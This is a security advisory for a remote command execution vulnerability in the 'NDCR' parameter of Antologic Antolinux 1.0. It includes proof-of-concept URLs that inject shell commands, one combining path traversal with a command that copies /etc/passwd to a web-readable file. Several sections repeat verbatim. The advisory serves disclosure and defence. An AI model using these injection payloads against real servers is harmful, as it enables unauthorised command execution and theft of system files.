Antologic Antolinux Administrative Interface NDCR Parameter Remote Command Execution Vulnerability
BID:9495
Info
Antologic Antolinux Administrative Interface NDCR Parameter Remote Command Execution Vulnerability
| Bugtraq ID: | 9495 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 26 2004 12:00AM |
| Updated: | Jan 26 2004 12:00AM |
| Credit: | The disclosure of this issue has been credited to Himeur Nourredine <[email protected]>. |
| Vulnerable: |
Antologic Antolinux 1.0 |
| Not Vulnerable: | |
Discussion
Antologic Antolinux Administrative Interface NDCR Parameter Remote Command Execution Vulnerability
It has been reported that Antologic Antolinux may be prone to a remote command execution vulnerability that may allow an attacker to execute arbitrary commands with the privileges of the server hosting the vulnerable software. The issue exists due to insufficient sanitization of user-supplied input via the 'NDCR' parameter. An attacker may need to spoof the HTTP REFERER and the vulnerability may only be exploited if sudo is not enabled.
Antologic Antolinux 1.0 has been reported to be prone to this issue, however, other versions may be affected as well.
It has been reported that Antologic Antolinux may be prone to a remote command execution vulnerability that may allow an attacker to execute arbitrary commands with the privileges of the server hosting the vulnerable software. The issue exists due to insufficient sanitization of user-supplied input via the 'NDCR' parameter. An attacker may need to spoof the HTTP REFERER and the vulnerability may only be exploited if sudo is not enabled.
Antologic Antolinux 1.0 has been reported to be prone to this issue, however, other versions may be affected as well.
Exploit / POC
Antologic Antolinux Administrative Interface NDCR Parameter Remote Command Execution Vulnerability
No exploit is required.
The following proof of concept examples have been supplied:
http://www.example.com/dns/ndcr.php?NDCR=anything;[arbritary commands]
http://www.example.com/libs/calendrier.php?lng=../../../../../../../../../home/web/ISA/htdocs/wmi/dns/ndcr&NDCR=foo ;cat /etc/passwd > lostnoobs.txt
No exploit is required.
The following proof of concept examples have been supplied:
http://www.example.com/dns/ndcr.php?NDCR=anything;[arbritary commands]
http://www.example.com/libs/calendrier.php?lng=../../../../../../../../../home/web/ISA/htdocs/wmi/dns/ndcr&NDCR=foo ;cat /etc/passwd > lostnoobs.txt
Solution / Fix
Antologic Antolinux Administrative Interface NDCR Parameter Remote Command Execution Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Antologic Antolinux Administrative Interface NDCR Parameter Remote Command Execution Vulnerability
References:
References:
- Antolinux (Antologic)